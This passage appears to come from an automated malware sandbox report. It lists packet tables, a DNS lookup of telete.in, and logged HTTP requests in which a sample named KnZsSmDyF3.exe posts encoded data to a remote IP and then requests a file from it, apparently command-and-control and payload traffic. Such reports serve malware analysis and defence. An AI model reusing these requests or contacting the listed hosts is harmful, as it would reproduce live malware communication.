Jul 22, 2021 11:28:05.958483934 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.958548069 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.958595991 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.958623886 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.958648920 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.958699942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.958714008 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.958751917 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.958817959 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.960398912 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.960464954 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.960515022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.960570097 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.960573912 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.960628986 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.960644960 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.960678101 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.960728884 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.960747957 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.960781097 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.960833073 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.960846901 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.960884094 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.960948944 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.960967064 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.960998058 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961042881 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961057901 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.961081028 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961127043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961137056 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.961170912 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961210012 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961234093 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.961261988 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961304903 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961323977 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.961348057 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961393118 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961405993 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.961436987 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961488008 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961507082 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.961534977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961579084 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961594105 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.961625099 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961668968 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961675882 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.961714029 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961759090 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961803913 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.961805105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961852074 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961874008 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.961894035 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961932898 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961971998 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.961975098 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.962012053 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962038994 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.962049961 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962090969 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962120056 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.962129116 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962177992 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962219000 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962258101 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962282896 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.962296963 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962308884 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.962338924 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962367058 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.962378025 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962423086 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962460995 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.962466002 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962512970 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962554932 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962599993 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962644100 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962647915 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.962687016 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962728977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962729931 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.962759972 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.962774992 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962822914 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.962824106 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962876081 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962908983 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.962924004 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962968111 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.962999105 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.963012934 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963057995 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963099957 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.963103056 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963182926 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.963186979 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963232040 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963272095 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963310003 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.963319063 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963363886 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963396072 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.963408947 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963453054 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963493109 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.963499069 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963537931 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963568926 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963598013 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.963598013 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963649988 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963675022 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.963692904 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963725090 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.963731050 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963762999 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963804960 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963846922 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963851929 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.963860989 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.963887930 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963931084 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.963952065 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.963979959 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.964021921 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.964050055 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.964061022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.964101076 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.964128971 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.964142084 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.964180946 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.964200020 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.964221954 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.964262009 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.964303017 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.964308023 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.964350939 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.964370966 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.964390993 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.964430094 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.964447975 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.964471102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.964514017 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.964538097 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.964560032 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.964602947 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.964622974 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.964828968 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:06.034575939 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.034615040 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.034651041 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.034684896 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.034729004 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.034768105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.034806013 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.034842968 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.034843922 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:06.034878969 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.034881115 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:06.034908056 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:06.034913063 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.035036087 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:06.038067102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.038109064 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.038141966 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.038184881 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.038223982 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.038253069 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:06.038259029 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.038280964 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:06.038369894 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:06.043735981 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.043781042 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.043817043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.043852091 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.043889046 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.043922901 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.043956995 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.043991089 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.044034004 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.044064999 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:06.044073105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.044094086 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:06.044100046 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:06.044104099 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:06.044106960 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.044154882 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.044186115 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:06.044195890 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.044233084 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.044270992 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.044308901 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.044331074 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:06.044356108 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.044399023 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.044436932 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.044476986 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.044476986 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:06.044516087 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.044552088 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:06.044610023 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:06.044625044 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:07.177747965 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:07.177972078 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:07.257256985 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:07.258055925 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:07.258086920 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:07.624876976 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:07.677891016 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:08.623106003 CEST	49718	443	192.168.2.3	195.201.225.248
Jul 22, 2021 11:28:08.623302937 CEST	49720	80	192.168.2.3	94.228.114.197

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2021 11:27:50.496285915 CEST	57544	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:27:50.555049896 CEST	53	57544	8.8.8.8	192.168.2.3
Jul 22, 2021 11:27:51.814985037 CEST	55984	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:27:51.867185116 CEST	53	55984	8.8.8.8	192.168.2.3
Jul 22, 2021 11:27:52.768445015 CEST	64185	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:27:52.820539951 CEST	53	64185	8.8.8.8	192.168.2.3
Jul 22, 2021 11:27:54.113425016 CEST	65110	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:27:54.162911892 CEST	53	65110	8.8.8.8	192.168.2.3
Jul 22, 2021 11:27:55.366540909 CEST	58361	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:27:55.418711901 CEST	53	58361	8.8.8.8	192.168.2.3
Jul 22, 2021 11:27:56.411997080 CEST	63492	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:27:56.469356060 CEST	53	63492	8.8.8.8	192.168.2.3
Jul 22, 2021 11:27:58.316513062 CEST	60831	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:27:58.366436958 CEST	53	60831	8.8.8.8	192.168.2.3
Jul 22, 2021 11:27:59.237405062 CEST	60100	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:27:59.294346094 CEST	53	60100	8.8.8.8	192.168.2.3
Jul 22, 2021 11:27:59.360223055 CEST	53195	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:27:59.418056011 CEST	53	53195	8.8.8.8	192.168.2.3
Jul 22, 2021 11:28:00.391997099 CEST	50141	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:28:00.448453903 CEST	53	50141	8.8.8.8	192.168.2.3
Jul 22, 2021 11:28:01.371438026 CEST	53023	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:28:01.423823118 CEST	53	53023	8.8.8.8	192.168.2.3
Jul 22, 2021 11:28:05.736887932 CEST	49563	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:28:05.789320946 CEST	53	49563	8.8.8.8	192.168.2.3
Jul 22, 2021 11:28:07.255095959 CEST	51352	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:28:07.314850092 CEST	53	51352	8.8.8.8	192.168.2.3
Jul 22, 2021 11:28:08.245987892 CEST	59349	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:28:08.297805071 CEST	53	59349	8.8.8.8	192.168.2.3
Jul 22, 2021 11:28:09.212188005 CEST	57084	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:28:09.268378019 CEST	53	57084	8.8.8.8	192.168.2.3
Jul 22, 2021 11:28:10.154738903 CEST	58823	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:28:10.206739902 CEST	53	58823	8.8.8.8	192.168.2.3
Jul 22, 2021 11:28:11.466063023 CEST	57568	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:28:11.518011093 CEST	53	57568	8.8.8.8	192.168.2.3
Jul 22, 2021 11:28:13.726449013 CEST	50540	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:28:13.776529074 CEST	53	50540	8.8.8.8	192.168.2.3
Jul 22, 2021 11:28:15.584723949 CEST	54366	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:28:15.641824007 CEST	53	54366	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 22, 2021 11:27:59.237405062 CEST	192.168.2.3	8.8.8.8	0x3cd	Standard query (0)	telete.in	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 22, 2021 11:27:59.294346094 CEST	8.8.8.8	192.168.2.3	0x3cd	No error (0)	telete.in		195.201.225.248	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

94.228.114.197

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49720	94.228.114.197	80	C:\Users\user\Desktop\KnZsSmDyF3.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 11:27:59.862427950 CEST	1120	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Content-Length: 128 Host: 94.228.114.197
Jul 22, 2021 11:27:59.862586021 CEST	1121	OUT	Data Raw: 6f 32 78 74 51 66 33 41 51 48 4d 49 74 4c 32 4e 77 4f 74 46 70 4a 6c 77 57 70 61 47 45 4a 62 38 36 4e 35 53 36 52 62 44 5a 4c 46 2f 57 45 77 37 69 56 4a 33 59 30 68 44 75 74 57 46 46 71 71 6f 35 71 35 71 36 4d 78 7a 42 69 79 4f 43 51 79 6e 6b 63 Data Ascii: o2xtQf3AQHMItL2NwOtFpJlwWpaGEJb86N5S6RbDZLF/WEw7iVJ3Y0hDutWFFqqo5q5q6MxzBiyOCQynkcZq8dR5gYSDvjBIPSxd/rxl6qZXbQwEStyXT+XAhR/Atg==
Jul 22, 2021 11:28:00.254823923 CEST	1130	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 22 Jul 2021 09:28:00 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Data Raw: 32 37 63 0d 0a 75 6e 4e 32 47 4b 2b 6e 50 6d 64 50 72 4c 33 56 67 5a 34 63 79 38 78 53 45 59 54 7a 54 63 53 62 32 64 34 44 6b 41 33 57 41 4f 56 4d 54 30 46 62 6e 33 38 48 62 51 5a 46 38 34 4c 4e 44 4b 53 6b 77 50 64 70 2b 61 34 62 55 58 72 76 54 68 6d 67 34 59 67 35 70 34 63 6f 68 6f 50 55 35 54 45 61 4d 53 77 4f 2b 72 78 6b 34 71 59 4e 50 41 49 4d 48 64 58 44 58 75 4c 4e 33 41 72 4a 36 63 45 4c 42 50 72 77 52 65 52 50 34 62 31 32 34 76 62 4c 37 58 61 79 44 53 66 6b 67 57 6f 6d 63 4f 49 54 78 2f 34 79 35 75 31 72 56 53 39 61 64 38 7a 78 6d 69 41 59 32 67 39 75 54 37 55 69 4a 59 38 65 5a 70 51 6c 53 70 70 6e 5a 6f 34 44 33 6a 34 31 35 6f 39 32 6a 32 55 71 53 74 46 34 4e 4c 67 76 4f 74 76 61 37 32 69 51 31 48 45 56 37 44 6e 73 73 68 55 6b 64 31 57 47 66 45 37 6c 4e 6e 6c 6b 49 33 47 70 38 5a 53 47 35 38 52 79 43 7a 39 31 58 59 59 50 7a 67 47 61 73 77 6a 47 63 46 33 45 4a 75 33 66 38 79 4a 64 49 37 41 36 61 31 51 4a 5a 54 62 45 76 6d 72 74 70 36 68 57 33 34 4d 56 43 52 6f 4f 35 53 42 52 75 7a 6b 46 35 53 34 48 70 53 6f 62 57 46 33 31 50 4a 42 41 59 37 56 6a 47 58 47 67 39 33 72 62 36 30 5a 67 6e 59 59 36 2b 52 49 32 51 79 77 69 68 58 2b 79 30 31 4d 63 79 44 4f 56 30 49 62 36 59 59 77 47 42 64 2f 51 53 6d 4a 6f 39 6b 64 64 44 70 76 37 43 70 61 45 78 7a 74 6f 65 44 42 41 2f 46 73 6d 48 38 55 34 62 39 4a 51 51 6f 46 6c 50 2f 71 37 34 64 51 41 7a 6d 71 6b 30 35 65 65 65 47 77 55 30 48 47 5a 30 74 50 53 68 46 49 32 4d 4c 33 54 75 4b 7a 63 75 5a 74 71 33 55 6e 63 53 65 6e 56 49 44 56 70 71 76 36 42 4a 33 37 64 4d 55 41 52 6c 4c 2b 4e 32 4a 43 4f 54 64 58 75 51 74 78 55 51 2f 47 51 32 39 62 56 33 79 37 4c 4f 59 52 5a 78 52 47 30 49 6f 58 5a 6c 66 4d 32 6a 47 6b 68 47 41 75 5a 38 6a 4d 34 71 6f 37 57 51 30 45 75 39 48 72 33 51 43 52 77 38 56 76 48 7a 33 31 4c 47 57 74 6e 6c 73 38 75 68 76 6c 70 48 75 7a 50 79 47 4f 62 67 41 6d 4d 34 76 6f 61 67 35 4e 53 39 6d 69 6d 48 37 31 61 53 39 41 71 4e 6a 55 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 27cunN2GK+nPmdPrL3VgZ4cy8xSEYTzTcSb2d4DkA3WAOVMT0Fbn38HbQZF84LNDKSkwPdp+a4bUXrvThmg4Yg5p4cohoPU5TEaMSwO+rxk4qYNPAIMHdXDXuLN3ArJ6cELBPrwReRP4b124vbL7XayDSfkgWomcOITx/4y5u1rVS9ad8zxmiAY2g9uT7UiJY8eZpQlSppnZo4D3j415o92j2UqStF4NLgvOtva72iQ1HEV7DnsshUkd1WGfE7lNnlkI3Gp8ZSG58RyCz91XYYPzgGaswjGcF3EJu3f8yJdI7A6a1QJZTbEvmrtp6hW34MVCRoO5SBRuzkF5S4HpSobWF31PJBAY7VjGXGg93rb60ZgnYY6+RI2QywihX+y01McyDOV0Ib6YYwGBd/QSmJo9kddDpv7CpaExztoeDBA/FsmH8U4b9JQQoFlP/q74dQAzmqk05eeeGwU0HGZ0tPShFI2ML3TuKzcuZtq3UncSenVIDVpqv6BJ37dMUARlL+N2JCOTdXuQtxUQ/GQ29bV3y7LOYRZxRG0IoXZlfM2jGkhGAuZ8jM4qo7WQ0Eu9Hr3QCRw8VvHz31LGWtnls8uhvlpHuzPyGObgAmM4voag5NS9mimH71aS9AqNjUX0
Jul 22, 2021 11:28:00.266067982 CEST	1130	OUT	GET //l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 94.228.114.197
